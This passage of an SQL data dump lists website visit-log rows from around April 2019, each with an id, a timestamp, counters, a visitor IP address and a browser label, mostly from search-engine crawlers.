149.76','other'),(407873,1554087011,1,1,0,0,'54.36.150.21','other'),(407874,1554087044,1,1,0,0,'54.36.149.46','other'),(407875,1554087226,1,1,0,0,'66.249.64.60','chrome'),(407876,1554087262,1,1,0,0,'13.66.139.0','other'),(407877,1554087269,1,1,0,0,'66.249.64.31','chrome'),(407878,1554087587,1,1,0,0,'54.36.148.224','other'),(407879,1554087605,1,1,0,0,'46.229.168.139','other'),(407880,1554087793,1,1,0,0,'54.36.150.91','other'),(407881,1554087940,1,1,0,0,'54.36.150.12','other'),(407882,1554088661,1,1,0,0,'54.36.149.39','other'),(407883,1554088749,1,1,0,0,'207.46.13.148','other'),(407884,1554088998,1,1,0,0,'54.36.148.158','other'),(407885,1554089135,1,1,0,0,'54.36.149.15','other'),(407886,1554089288,1,1,0,0,'54.36.149.73','other'),(407887,1554089301,1,1,0,0,'54.36.148.37','other'),(407888,1554089402,1,1,0,0,'66.249.64.30','chrome'),(407889,1554089428,2,2,0,0,'66.249.64.29','chrome'),(407890,1554089619,1,1,0,0,'54.36.150.79','other'),(407891,1554089756,1,1,0,0,'54.36.150.190','other'),(407892,1554090132,1,1,0,0,'91.196.178.47','chrome'),(407893,1554090163,1,1,0,0,'54.36.150.120','other'),(407894,1554090433,2,2,0,0,'66.249.64.31','chrome'),(407895,1554090603,1,1,0,0,'207.46.13.148','other'),(407896,1554090617,1,1,0,0,'54.36.149.25','other'),(407897,1554090619,1,1,0,0,'54.36.148.201','other'),(407898,1554090636,1,1,0,0,'54.36.148.0','other'),(407899,1554090830,1,1,0,0,'66.249.64.30','chrome'),(407900,1554090970,1,1,0,0,'5.188.210.44','chrome'),(407901,1554091065,1,1,0,0,'157.55.39.202','other'),(407902,1554091348,1,1,0,0,'66.249.64.31','chrome'),(407903,1554091375,1,1,0,0,'66.249.64.58','chrome'),(407904,1554091581,1,1,0,0,'54.36.148.50','other'),(407905,1554091891,2,2,0,0,'193.201.224.213','msie'),(407906,1554092157,1,1,0,0,'54.36.150.87','other'),(407907,1554092261,1,1,0,0,'54.36.148.116','other'),(407908,1554092290,2,2,0,0,'8.29.198.25','other'),(407909,1554092319,1,1,0,0,'40.77.167.157','other'),(407910,1554092706,1,1,0,0,'54.36.150.58','other'),(407911,1554093333,1,1,0,0,'40.77.167.157','other'),(407912,1554093334,1,1,0,0,'54.36.150.124','other'),(407913,1554093337,1,1,0,0,'54.36.148.137','other'),(407914,1554093420,1,1,0,0,'54.36.150.28','other'),(407915,1554093484,1,1,0,0,'54.36.148.139','other'),(407916,1554093636,2,2,0,0,'178.154.244.11','other'),(407917,1554093649,1,1,0,0,'54.36.150.40','other'),(407918,1554093870,2,2,0,0,'66.249.64.30','chrome'),(407919,1554094070,1,1,0,0,'5.45.207.19','other'),(407920,1554094247,1,1,0,0,'54.36.150.179','other'),(407921,1554094308,1,1,0,0,'66.249.64.29','chrome'),(407922,1554094449,1,1,0,0,'66.249.64.60','chrome'),(407923,1554094487,1,1,0,0,'87.250.224.65','other'),(407924,1554094601,2,2,0,0,'87.250.224.47','other'),(407925,1554094609,1,1,0,0,'5.45.207.79','other'),(407926,1554094613,4,4,0,0,'178.154.244.11','other'),(407927,1554094761,1,1,0,0,'37.9.113.148','other'),(407928,1554094987,1,1,0,0,'54.36.148.135','other'),(407929,1554095019,1,1,0,0,'207.46.13.139','other'),(407930,1554095239,1,1,0,0,'5.188.210.44','chrome'),(407931,1554095341,1,1,0,0,'54.36.150.55','other'),(407932,1554095342,1,1,0,0,'5.45.207.19','other'),(407933,1554095570,2,2,0,0,'207.46.13.148','other'),(407934,1554095600,1,1,0,0,'54.36.150.139','other'),(407935,1554096041,1,1,0,0,'54.36.150.131','other'),(407936,1554096483,1,1,0,0,'54.36.150.172','other'),(407937,1554096578,1,1,0,0,'54.36.150.59','other'),(407938,1554096747,1,1,0,0,'178.175.132.209','other'),(407939,1554096787,7,7,0,0,'66.249.64.29','chrome'),(407940,1554097201,1,1,0,0,'54.36.149.26','other'),(407941,1554097338,1,1,0,0,'54.36.148.182','other'),(407942,1554097345,1,1,0,0,'54.36.148.194','other'),(407943,1554097371,1,1,0,0,'66.249.64.31','chrome'),(407944,1554097385,5,5,0,0,'66.249.64.30','chrome'),(407945,1554097417,1,1,0,0,'54.36.148.18','other'),(407946,1554097567,1,1,0,0,'54.36.148.131','other'),(407947,1554097697,1,1,0,0,'40.77.167.157','other'),(407948,1554097901,1,1,0,0,'54.36.148.109','other'),(407949,1554098331,1,1,0,0,'54.36.148.125','other'),(407950,1554098442,1,1,0,0,'54.36.148.167','other'),(407951,1554098600,2,2,0,0,'66.249.64.29','chrome'),(407952,1554099048,1,1,0,0,'54.36.150.150','other'),(407953,1554099165,3,3,0,0,'66.249.64.31','chrome'),(407954,1554099498,1,1,0,0,'91.124.182.170','firefox'),(407955,1554099616,1,1,0,0,'54.36.148.211','other'),(407956,1554099623,1,1,0,0,'54.36.148.57','other'),(407957,1554099758,1,1,0,0,'46.229.168.143','other'),(407958,1554100074,1,1,0,0,'66.249.64.29','chrome'),(407959,1554100080,1,1,0,0,'54.36.148.186','other'),(407960,1554100115,1,1,0,0,'193.106.30.98','firefox'),(407961,1554100246,1,1,0,0,'46.229.168.137','other'),(407962,1554101036,1,1,0,0,'54.36.150.10','other'),(407963,1554101180,1,1,0,0,'54.36.149.5','other'),(407964,1554101280,1,1,0,0,'54.36.150.72','other'),(407965,1554101421,1,1,0,0,'54.36.148.204','other'),(407966,1554101556,1,1,0,0,'66.249.64.58','chrome'),(407967,1554101641,1,1,0,0,'54.36.150.25','other'),(407968,1554101724,1,1,0,0,'54.36.148.62','other'),(407969,1554101819,1,1,0,0,'66.249.64.29','chrome'),(407970,1554102072,1,1,0,0,'46.229.168.133','other'),(407971,1554102114,1,1,0,0,'54.36.148.92','other'),(407972,1554102384,1,1,0,0,'54.36.148.61','other'),(407973,1554102507,1,1,0,0,'54.36.149.66','other'),(407974,1554102914,1,1,0,0,'46.229.168.129','other'),(407975,1554103124,1,1,0,0,'8.29.198.27','other'),(407976,1554103266,1,1,0,0,'5.45.207.19','other'),(407977,1554103366,2,2,0,0,'178.154.244.11','other'),(407978,1554103429,1,1,0,0,'54.36.150.11','other'),(407979,1554103459,1,1,0,0,'8.29.198.25','other'),(407980,1554104115,1,1,0,0,'66.249.64.31','chrome'),(407981,1554104146,1,1,0,0,'54.36.150.140','other'),(407982,1554104180,1,1,0,0,'5.255.253.38','other'),(407983,1554104291,1,1,0,0,'46.229.168.137','other'),(407984,1554105000,1,1,0,0,'54.36.148.88','other'),(407985,1554105159,1,1,0,0,'54.36.148.199','other'),(407986,1554105200,1,1,0,0,'66.249.64.31','chrome'),(407987,1554105465,1,1,0,0,'89.162.139.30','chrome'),(407988,1554105744,1,1,0,0,'91.229.121.1','chrome'),(407989,1554106028,1,1,0,0,'54.36.149.59','other'),(407990,1554106144,1,1,0,0,'54.36.150.153','other'),(407991,1554106245,1,1,0,0,'46.229.168.142','other'),(407992,1554106408,1,1,0,0,'54.36.150.127','other'),(407993,1554106633,1,1,0,0,'54.36.148.111','other'),(407994,1554106977,1,1,0,0,'54.36.148.47','other'),(407995,1554107008,1,1,0,0,'54.36.148.80','other'),(407996,1554107508,1,1,0,0,'54.36.150.115','other'),(407997,1554107694,1,1,0,0,'46.229.168.144','other'),(407998,1554107810,2,2,0,0,'54.36.148.182','other'),(407999,1554107847,3,3,0,0,'66.249.64.30','chrome'),(408000,1554107920,1,1,0,0,'93.183.229.198','chrome'),(408001,1554107936,1,1,0,0,'54.36.148.194','other'),(408002,1554108039,1,1,0,0,'46.229.168.161','other'),(408003,1554108082,1,1,0,0,'54.36.150.5','other'),(408004,1554108468,1,1,0,0,'54.36.149.4','other'),(408005,1554108654,1,1,0,0,'54.36.150.3','other'),(408006,1554108758,1,1,0,0,'54.36.149.23','other'),(408007,1554109200,1,1,0,0,'54.36.148.188','other'),(408008,1554109702,1,1,0,0,'54.36.150.72','other'),(408009,1554109732,1,1,0,0,'54.36.150.54','other'),(408010,1554109839,1,1,0,0,'54.36.148.154','other'),(408011,1554109844,1,1,0,0,'95.132.23.133','firefox'),(408012,1554109999,1,1,0,0,'91.196.178.130','firefox'),(408013,1554110067,1,1,0,0,'91.196.178.58','other'),(408014,1554110088,1,1,0,0,'42.236.10.106','chrome'),(408015,1554110090,1,1,0,0,'42.236.10.124','chrome'),(408016,1554110111,1,1,0,0,'180.163.220.68','chrome'),(408017,1554110142,1,1,0,0,'180.163.220.3','other'),(408018,1554110197,1,1,0,0,'42.236.10.114','chrome'),(408019,1554110216,1,1,0,0,'42.236.10.92','chrome'),(408020,1554110316,1,1,0,0,'46.229.168.139','other'),(408021,1554110471,1,1,0,0,'54.36.150.3','other'),(408022,1554110615,1,1,0,0,'144.208.195.248','firefox'),(408023,1554110730,1,1,0,0,'157.55.39.202','other'),(408024,1554110751,1,1,0,0,'54.36.149.6','other'),(408025,1554110897,1,1,0,0,'91.196.178.173','chrome'),(408026,1554110932,1,1,0,0,'91.124.182.170','firefox'),(408027,1554111092,1,1,0,0,'54.36.148.58','other'),(408028,1554111181,1,1,0,0,'46.229.168.152','other'),(408029,1554111360,1,1,0,0,'54.36.148.79','other'),(408030,1554111471,1,1,0,0,'46.229.168.148','other'),(408031,1554111561,1,1,0,0,'54.36.148.105','other'),(408032,1554111633,1,1,0,0,'46.229.168.138','other'),(408033,1554111644,1,1,0,0,'54.36.150.186','other'),(408034,1554111674,1,1,0,0,'5.196.87.171','other'),(408035,1554111728,1,1,0,0,'91.196.178.66','chrome'),(408036,1554111835,1,1,0,0,'91.124.182.170','firefox'),(408037,1554111861,1,1,0,0,'66.249.64.30','chrome'),(408038,1554112030,1,1,0,0,'46.229.168.134','other'),(408039,1554112237,1,1,0,0,'54.36.148.87','other'),(408040,1554112365,2,2,0,0,'178.154.244.11','other'),(408041,1554112369,2,2,0,0,'5.45.207.19','other'),(408042,1554112626,1,1,0,0,'157.55.39.202','other'),(408043,1554112639,1,1,0,0,'87.250.224.47','other'),(408044,1554112645,1,1,0,0,'46.229.168.136','other'),(408045,1554112866,1,1,0,0,'91.124.182.170','firefox'),(408046,1554113142,1,1,0,0,'66.249.64.30','chrome'),(408047,1554113309,1,1,0,0,'66.249.64.29','chrome'),(408048,1554113455,1,1,0,0,'180.76.15.10','other'),(408049,1554113581,1,1,0,0,'95.108.213.4','other'),(408050,1554113623,1,1,0,0,'54.36.148.238','other'),(408051,1554113632,1,1,0,0,'54.36.150.172','other'),(408052,1554113774,1,1,0,0,'54.36.148.178','other'),(408053,1554113969,1,1,0,0,'8.29.198.26','other'),(408054,1554113997,1,1,0,0,'54.36.148.120','other'),(408055,1554114301,1,1,0,0,'8.29.198.25','other'),(408056,1554114884,1,1,0,0,'46.229.168.140','other'),(408057,1554115330,1,1,0,0,'54.36.149.12','other'),(408058,1554115676,1,1,0,0,'157.55.39.202','other'),(408059,1554115812,1,1,0,0,'54.36.148.8','other'),(408060,1554116077,1,1,0,0,'46.229.168.143','other'),(408061,1554116354,1,1,0,0,'207.46.13.16','other'),(408062,1554116587,1,1,0,0,'157.55.39.202','other'),(408063,1554116861,1,1,0,0,'54.36.150.68','other'),(408064,1554116943,1,1,0,0,'54.36.148.193','other'),(408065,1554117470,1,1,0,0,'194.44.58.165','firefox'),(408066,1554117649,1,1,0,0,'40.77.167.68','other'),(408067,1554117720,1,1,0,0,'54.36.150.31','other'),(408068,1554118200,1,1,0,0,'91.124.182.170','firefox'),(408069,1554118271,1,1,0,0,'91.196.121.13','chrome'),(408070,1554118408,1,1,0,0,'66.249.64.62','chrome'),(408071,1554118709,2,2,0,0,'66.249.64.31','chrome'),(408072,1554119020,2,2,0,0,'66.249.64.29','chrome'),(408073,1554119119,1,1,0,0,'40.77.167.175','other'),(408074,1554119395,1,1,0,0,'46.229.168.146','other'),(408075,1554120064,1,1,0,0,'66.249.64.31','chrome'),(408076,1554120364,1,1,0,0,'157.55.39.202','other'),(408077,1554120474,1,1,0,0,'46.229.168.144','other'),(408078,1554120531,5,5,0,0,'178.154.244.11','other'),(408079,1554120639,1,1,0,0,'54.36.148.52','other'),(408080,1554120667,1,1,0,0,'54.36.150.90','other'),(408081,1554120676,3,3,0,0,'66.249.64.29','chrome'),(408082,1554120777,1,1,0,0,'37.9.113.20','other'),(408083,1554120802,2,2,0,0,'91.196.178.43','chrome'),(408084,1554120841,1,1,0,0,'54.36.148.255','other'),(408085,1554120950,1,1,0,0,'91.124.182.170','firefox'),(408086,1554121041,1,1,0,0,'194.44.41.129','chrome'),(408087,1554121208,1,1,0,0,'66.249.64.60','chrome'),(408088,1554121368,1,1,0,0,'46.229.168.163','other'),(408089,1554121398,1,1,0,0,'5.45.207.79','other'),(408090,1554121410,1,1,0,0,'141.8.142.103','other'),(408091,1554121467,1,1,0,0,'54.36.148.103','other'),(408092,1554121770,2,2,0,0,'91.196.178.43','chrome'),(408093,1554121818,1,1,0,0,'54.36.150.9','other'),(408094,1554121974,1,1,0,0,'54.36.150.101','other'),(408095,1554122219,1,1,0,0,'40.77.167.175','other'),(408096,1554122434,2,2,0,0,'91.196.177.118','chrome'),(408097,1554122644,2,2,0,0,'66.249.64.29','chrome'),(408098,1554123317,1,1,0,0,'91.196.178.90','firefox'),(408099,1554123512,1,1,0,0,'157.55.39.202','other'),(408100,1554123528,1,1,0,0,'46.229.168.136','other'),(408101,1554123758,1,1,0,0,'66.249.64.58','chrome'),(408102,1554123868,1,1,0,0,'66.249.64.30','chrome'),(408103,1554123897,1,1,0,0,'54.36.149.80','other'),(408104,1554124048,1,1,0,0,'66.249.64.31','chrome'),(408105,1554124062,1,1,0,0,'37.54.183.138','chrome'),(408106,1554124147,1,1,0,0,'54.36.148.149','other'),(408107,1554124187,1,1,0,0,'54.36.148.88','other'),(408108,1554124211,1,1,0,0,'40.77.167.175','other'),(408109,1554124618,1,1,0,0,'91.196.178.66','chrome'),(408110,1554124818,1,1,0,0,'8.29.198.26','other'),(408111,1554124831,1,1,0,0,'178.93.39.140','chrome'),(408112,1554124833,1,1,0,0,'54.36.150.169','other'),(408113,1554124910,1,1,0,0,'54.36.148.117','other'),(408114,1554124942,2,2,0,0,'66.249.64.29','chrome'),(408115,1554124992,1,1,0,0,'66.249.64.31','chrome'),(408116,1554125161,1,1,0,0,'5.196.92.91','firefox'),(408117,1554125167,1,1,0,0,'8.29.198.25','other'),(408118,1554125213,1,1,0,0,'54.36.148.224','other'),(408119,1554125393,1,1,0,0,'46.229.168.129','other'),(408120,1554125432,1,1,0,0,'94.179.253.24','chrome'),(408121,1554125440,1,1,0,0,'40.77.167.175','other'),(408122,1554125647,1,1,0,0,'54.36.149.23','other'),(408123,1554126099,1,1,0,0,'207.46.13.16','other'),(408124,1554126187,1,1,0,0,'54.36.148.8','other'),(408125,1554126209,1,1,0,0,'54.36.150.66','other'),(408126,1554126214,1,1,0,0,'54.36.148.151','other'),(408127,1554126314,1,1,0,0,'54.36.148.109','other'),(408128,1554126321,1,1,0,0,'54.36.148.55','other'),(408129,1554126824,1,1,0,0,'54.36.149.74','other'),(408130,1554126848,1,1,0,0,'91.196.177.118','chrome'),(408131,1554127772,1,1,0,0,'46.229.168.148','other'),(408132,1554127901,3,3,0,0,'87.250.224.47','other'),(408133,1554128209,1,1,0,0,'91.196.177.46','chrome'),(408134,1554128478,1,1,0,0,'54.36.149.106','other'),(408135,1554128607,1,1,0,0,'95.108.213.4','other'),(408136,1554128745,1,1,0,0,'66.249.64.30','chrome'),(408137,1554128843,1,1,0,0,'46.229.168.134','other'),(408138,1554128954,1,1,0,0,'54.36.149.88','other'),(408139,1554129038,1,1,0,0,'66.249.64.31','chrome'),(408140,1554129237,1,1,0,0,'66.249.64.29','chrome'),(408141,1554129406,1,1,0,0,'46.229.168.147','other'),(408142,1554129576,1,1,0,0,'54.36.148.89','other'),(408143,1554129582,1,1,0,0,'52.53.201.78','chrome'),(408144,1554129750,1,1,0,0,'91.196.177.118','chrome'),(408145,1554129994,1,1,0,0,'141.8.142.103','other'),(408146,1554130203,1,1,0,0,'54.36.149.32','other'),(408147,1554130349,1,1,0,0,'46.229.168.135','other'),(408148,1554130387,1,1,0,0,'54.36.148.65','other'),(408149,1554130563,1,1,0,0,'54.36.150.180','other'),(408150,1554130942,1,1,0,0,'54.36.150.64','other'),(408151,1554131375,1,1,0,0,'66.249.64.30','chrome'),(408152,1554131841,1,1,0,0,'54.36.148.112','other'),(408153,1554131923,1,1,0,0,'54.36.150.187','other'),(408154,1554132141,1,1,0,0,'54.36.149.24','other'),(408155,1554132465,1,1,0,0,'54.36.148.42','other'),(408156,1554132707,1,1,0,0,'157.55.39.202','other'),(408157,1554132750,1,1,0,0,'40.77.167.175','other'),(408158,1554132863,2,2,0,0,'95.213.141.126','opera'),(408159,1554133373,2,2,0,0,'66.249.64.58','chrome'),(408160,1554133436,1,1,0,0,'46.229.168.152','other'),(408161,1554133794,1,1,0,0,'66.249.64.31','chrome'),(408162,1554134377,1,1,0,0,'54.36.149.24','other'),(408163,1554134497,1,1,0,0,'213.108.41.211','chrome'),(408164,1554134851,2,2,0,0,'5.45.207.79','other'),(408165,1554135049,1,1,0,0,'66.249.64.62','chrome'),(408166,1554135069,1,1,0,0,'66.249.64.60','chrome'),(408167,1554135105,2,2,0,0,'46.229.168.161','other'),(408168,1554135229,1,1,0,0,'178.154.244.11','other'),(408169,1554135278,1,1,0,0,'178.95.67.7','chrome'),(408170,1554135281,1,1,0,0,'54.36.150.129','other'),(408171,1554135410,1,1,0,0,'180.76.15.13','other'),(408172,1554135503,1,1,0,0,'54.36.150.28','other'),(408173,1554135659,1,1,0,0,'8.29.198.26','other'),(408174,1554136010,1,1,0,0,'8.29.198.25','other'),(408175,1554136086,1,1,0,0,'54.36.150.63','other'),(408176,1554136133,1,1,0,0,'54.36.149.27','other'),(408177,1554136154,1,1,0,0,'54.36.148.202','other'),(408178,1554136303,1,1,0,0,'54.36.148.141','other'),(408179,1554136827,1,1,0,0,'54.36.149.36','other'),(408180,1554136988,1,1,0,0,'54.36.148.23','other'),(408181,1554137126,1,1,0,0,'54.36.149.88','other'),(408182,1554137128,1,1,0,0,'37.115.191.132','chrome'),(408183,1554137767,1,1,0,0,'54.36.148.60','other'),(408184,1554137817,1,1,0,0,'54.36.148.16','other'),(408185,1554138035,1,1,0,0,'54.36.149.9','other'),(408186,1554138070,1,1,0,0,'66.249.64.62','chrome'),(408187,1554138201,1,1,0,0,'66.249.64.30','chrome'),(408188,1554138237,1,1,0,0,'54.36.148.175','other'),(408189,1554138278,1,1,0,0,'91.209.11.236','other'),(408190,1554138544,1,1,0,0,'207.46.13.51','other'),(408191,1554138624,1,1,0,0,'54.36.148.27','other'),(408192,1554138705,1,1,0,0,'54.36.150.139','other'),(408193,1554138905,1,1,0,0,'91.193.166.104','firefox'),(408194,1554139286,1,1,0,0,'54.36.150.25','other'),(408195,1554139373,1,1,0,0,'46.229.168.135','other'),(408196,1554139780,1,1,0,0,'54.36.148.193','other'),(408197,1554139843,1,1,0,0,'54.36.150.146','other'),(408198,1554139856,1,1,0,0,'37.73.167.113','chrome'),(408199,1554139926,1,1,0,0,'66.249.64.30','chrome'),(408200,1554140088,1,1,0,0,'54.36.148.78','other'),(408201,1554140297,1,1,0,0,'31.43.104.143','chrome'),(408202,1554140367,2,2,0,0,'66.249.64.62','chrome'),(408203,1554140427,1,1,0,0,'54.36.148.240','other'),(408204,1554140598,1,1,0,0,'54.36.150.3','other'),(408205,1554140613,1,1,0,0,'54.36.148.134','other'),(408206,1554140639,1,1,0,0,'54.36.149.31','other'),(408207,1554140746,1,1,0,0,'5.248.165.148','chrome'),(408208,1554141053,4,4,0,0,'46.161.14.130','firefox'),(408209,1554141370,1,1,0,0,'46.229.168.135','other'),(408210,1554141400,1,1,0,0,'207.189.30.212','chrome'),(408211,1554141402,1,1,0,0,'91.196.178.71','firefox'),(408212,1554141603,1,1,0,0,'66.249.64.30','chrome'),(408213,1554141889,1,1,0,0,'54.36.150.82','other'),(408214,1554141985,1,1,0,0,'54.36.148.182','other'),(408215,1554142450,1,1,0,0,'54.36.150.2','other'),(408216,1554142700,1,1,0,0,'54.36.149.72','other'),(408217,1554142797,1,1,0,0,'66.249.64.58','chrome'),(408218,1554142849,1,1,0,0,'54.36.148.17','other'),(408219,1554143045,1,1,0,0,'54.36.150.10','other'),(408220,1554143178,1,1,0,0,'66.249.64.62','chrome'),(408221,1554143332,1,1,0,0,'54.36.150.117','other'),(408222,1554143472,1,1,0,0,'5.248.165.148','chrome'),(408223,1554143568,1,1,0,0,'46.229.168.135','other'),(408224,1554143755,1,1,0,0,'54.36.148.90','other'),(408225,1554143769,1,1,0,0,'54.36.148.14','other'),(408226,1554143773,1,1,0,0,'54.36.148.186','other'),(408227,1554143841,1,1,0,0,'157.55.39.202','other'),(408228,1554144086,1,1,0,0,'54.36.148.30','other'),(408229,1554144311,1,1,0,0,'54.36.148.245','other'),(408230,1554144389,1,1,0,0,'54.36.148.20','other'),(408231,1554144654,1,1,0,0,'54.36.148.95','other'),(408232,1554144658,1,1,0,0,'54.36.148.19','other'),(408233,1554145091,1,1,0,0,'46.229.168.147','other'),(408234,1554145351,1,1,0,0,'54.36.148.8','other'),(408235,1554145386,2,2,0,0,'207.46.13.51','other'),(408236,1554145419,1,1,0,0,'91.196.178.174','chrome'),(408237,1554145486,1,1,0,0,'13.57.233.99','chrome'),(408238,1554145763,1,1,0,0,'54.36.150.10','other'),(408239,1554145892,1,1,0,0,'54.36.150.91','other'),(408240,1554146057,1,1,0,0,'54.36.148.67','other'),(408241,1554146169,1,1,0,0,'157.55.39.202','other'),(408242,1554146327,1,1,0,0,'54.36.149.54','other'),(408243,1554146499,1,1,0,0,'8.29.198.27','other'),(408244,1554146603,1,1,0,0,'207.46.13.57','other'),(408245,1554146715,1,1,0,0,'54.36.148.105','other'),(408246,1554146856,1,1,0,0,'8.29.198.25','other'),(408247,1554147114,1,1,0,0,'54.36.149.36','other'),(408248,1554147249,1,1,0,0,'207.46.13.74','other'),(408249,1554147300,1,1,0,0,'54.36.150.119','other'),(408250,1554147314,1,1,0,0,'54.36.150.33','other'),(408251,1554147417,1,1,0,0,'46.229.168.130','other'),(408252,1554147745,1,1,0,0,'46.229.168.137','other'),(408253,1554147806,1,1,0,0,'46.229.168.154','other'),(408254,1554147821,1,1,0,0,'46.229.168.129','other'),(408255,1554147914,1,1,0,0,'213.180.203.40','other'),(408256,1554147938,1,1,0,0,'95.108.213.4','other'),(408257,1554148037,1,1,0,0,'54.36.148.160','other'),(408258,1554148263,1,1,0,0,'54.36.148.176','other'),(408259,1554148279,1,1,0,0,'54.36.148.199','other'),(408260,1554148357,1,1,0,0,'54.36.150.20','other'),(408261,1554148382,1,1,0,0,'46.229.168.152','other'),(408262,1554148402,1,1,0,0,'46.229.168.148','other'),(408263,1554148529,1,1,0,0,'87.250.224.81','other'),(408264,1554148700,1,1,0,0,'54.36.149.75','other'),(408265,1554149412,1,1,0,0,'54.36.148.50','other'),(408266,1554149455,1,1,0,0,'54.36.148.92','other'),(408267,1554149908,1,1,0,0,'5.196.87.175','other'),(408268,1554149944,1,1,0,0,'54.36.148.195','other'),(408269,1554150092,1,1,0,0,'54.36.150.8','other'),(408270,1554150373,1,1,0,0,'54.36.150.114','other'),(408271,1554150499,1,1,0,0,'207.46.13.145','other'),(408272,1554151309,1,1,0,0,'54.36.149.38','other'),(408273,1554151566,1,1,0,0,'46.229.168.163','other'),(408274,1554151659,1,1,0,0,'46.229.168.152','other'),(408275,1554152279,1,1,0,0,'54.36.148.41','other'),(408276,1554152507,1,1,0,0,'54.36.150.65','other'),(408277,1554152525,1,1,0,0,'54.36.150.170','other'),(408278,1554152744,1,1,0,0,'178.255.215.94','other'),(408280,1554152898,1,1,0,0,'66.249.64.31','chrome'),(408281,1554153636,1,1,0,0,'54.36.148.189','other'),(408282,1554153731,1,1,0,0,'66.249.64.60','chrome'),(408283,1554153852,1,1,0,0,'207.46.13.145','other'),(408284,1554153882,1,1,0,0,'66.249.64.29','chrome'),(408285,1554154219,1,1,0,0,'54.36.150.191','other'),(408286,1554154271,1,1,0,0,'54.36.149.42','other'),(408287,1554154292,1,1,0,0,'46.229.168.141','other'),(408288,1554154962,1,1,0,0,'54.36.150.75','other'),(408289,1554155413,1,1,0,0,'54.36.148.50','other'),(408290,1554155730,1,1,0,0,'157.55.39.254','other'),(408291,1554155802,1,1,0,0,'46.229.168.135','other'),(408292,1554155864,1,1,0,0,'54.36.148.176','other'),(408293,1554155946,1,1,0,0,'46.229.168.140','other'),(408294,1554156304,1,1,0,0,'54.36.149.9','other'),(408295,1554156321,1,1,0,0,'195.154.50.91','chrome'),(408296,1554156336,2,2,0,0,'62.210.83.206','chrome'),(408297,1554156580,2,2,0,0,'5.45.207.19','other'),(408298,1554157047,1,1,0,0,'207.46.13.57','other'),(408299,1554157082,1,1,0,0,'46.229.168.148','other'),(408300,1554157334,1,1,0,0,'8.29.198.25','other'),(408301,1554157345,1,1,0,0,'141.8.142.103','other'),(408302,1554157346,1,1,0,0,'66.249.64.31','chrome'),(408303,1554157354,1,1,0,0,'95.108.213.4','other'),(408304,1554157374,1,1,0,0,'178.154.244.11','other'),(408305,1554157659,1,1,0,0,'46.229.168.130','other'),(408306,1554157699,1,1,0,0,'8.29.198.27','other'),(408307,1554158512,1,1,0,0,'54.36.148.187','other'),(408308,1554159109,1,1,0,0,'207.46.13.57','other'),(408309,1554159162,1,1,0,0,'54.36.149.1','other'),(408310,1554159426,1,1,0,0,'54.36.149.75','other'),(408311,1554159865,1,1,0,0,'46.229.168.144','other'),(408312,1554160364,1,1,0,0,'54.36.149.86','other'),(408313,1554160366,1,1,0,0,'54.36.150.56','other'),(408314,1554160697,1,1,0,0,'217.69.143.69','other'),(408315,1554161059,1,1,0,0,'54.36.150.91','other'),(408316,1554161811,1,1,0,0,'54.36.149.94','other'),(408317,1554161880,1,1,0,0,'54.36.150.186','other'),(408318,1554162264,1,1,0,0,'66.249.64.29','chrome'),(408319,1554162340,2,2,0,0,'207.46.13.74','other'),(408320,1554162454,1,1,0,0,'207.46.13.57','other'),(408321,1554162603,1,1,0,0,'54.36.150.69','other'),(408322,1554163073,1,1,0,0,'54.36.150.159','other'),(408323,1554163178,1,1,0,0,'54.36.148.143','other'),(408324,1554163538,1,1,0,0,'46.229.168.142','other'),(408325,1554163800,1,1,0,0,'109.74.154.72','chrome'),(408326,1554164403,1,1,0,0,'66.249.64.29','chrome'),(408327,1554165151,1,1,0,0,'54.36.150.174','other'),(408328,1554165287,1,1,0,0,'40.77.167.178','other'),(408329,1554165552,1,1,0,0,'54.36.148.178','other'),(408330,1554165851,1,1,0,0,'66.249.64.31','chrome'),(408331,1554166116,1,1,0,0,'207.46.13.145','other'),(408332,1554166182,1,1,0,0,'54.36.149.15','other'),(408333,1554166277,1,1,0,0,'54.36.150.13','other'),(408334,1554166510,2,2,0,0,'66.249.64.29','chrome'),(408335,1554166639,2,2,0,0,'157.55.39.254','other'),(408336,1554167215,1,1,0,0,'54.36.149.76','other'),(408337,1554167381,1,1,0,0,'54.36.150.167','other'),(408338,1554167505,1,1,0,0,'141.8.142.103','other'),(408339,1554167577,1,1,0,0,'87.250.224.47','other'),(408340,1554167794,1,1,0,0,'5.45.207.79','other'),(408341,1554167852,1,1,0,0,'54.36.148.111','other'),(408342,1554168053,1,1,0,0,'37.9.113.20','other'),(408343,1554168176,1,1,0,0,'8.29.198.27','other'),(408344,1554168540,1,1,0,0,'8.29.198.26','other'),(408345,1554168644,1,1,0,0,'54.36.148.97','other'),(408346,1554168878,2,2,0,0,'66.249.64.30','chrome'),(408347,1554168928,1,1,0,0,'178.154.171.24','other'),(408348,1554169026,1,1,0,0,'157.55.39.254','other'),(408349,1554169150,1,1,0,0,'66.249.64.58','chrome'),(408350,1554169306,1,1,0,0,'54.36.148.194','other'),(408351,1554169626,1,1,0,0,'207.46.13.145','other'),(408352,1554169772,1,1,0,0,'180.76.15.11','other'),(408353,1554170142,1,1,0,0,'46.229.168.144','other'),(408354,1554170700,1,1,0,0,'54.36.148.7','other'),(408355,1554170825,1,1,0,0,'46.229.168.149','other'),(408356,1554170990,1,1,0,0,'54.36.150.71','other'),(408357,1554171522,1,1,0,0,'180.76.15.152','other'),(408358,1554171546,2,2,0,0,'54.188.195.52','chrome'),(408359,1554171586,2,2,0,0,'207.46.13.213','other'),(408360,1554171847,1,1,0,0,'54.36.150.153','other'),(408361,1554171977,1,1,0,0,'46.229.168.151','other'),(408362,1554172248,1,1,0,0,'54.36.149.105','other'),(408363,1554172272,1,1,0,0,'207.46.13.57','other'),(408364,1554172361,1,1,0,0,'54.36.150.38','other'),(408365,1554172465,1,1,0,0,'207.46.13.145','other'),(408366,1554172506,1,1,0,0,'157.55.39.102','other'),(408367,1554172647,1,1,0,0,'46.229.168.141','other'),(408368,1554172808,1,1,0,0,'54.36.149.77','other'),(408369,1554172818,1,1,0,0,'54.36.148.224','other'),(408370,1554173049,1,1,0,0,'46.229.168.146','other'),(408371,1554173785,1,1,0,0,'46.229.168.153','other'),(408372,1554174150,1,1,0,0,'46.229.168.136','other'),(408373,1554174317,1,1,0,0,'207.46.13.145','other'),(408374,1554174353,1,1,0,0,'54.36.149.12','other'),(408375,1554175034,1,1,0,0,'46.229.168.145','other'),(408376,1554175172,1,1,0,0,'54.36.149.103','other'),(408377,1554175366,1,1,0,0,'54.36.148.138','other'),(408378,1554175466,1,1,0,0,'54.36.149.0','other'),(408379,1554176261,1,1,0,0,'46.229.168.150','other'),(408380,1554176294,1,1,0,0,'66.249.64.58','chrome'),(408381,1554176777,1,1,0,0,'46.229.168.137','other'),(408382,1554176793,1,1,0,0,'157.55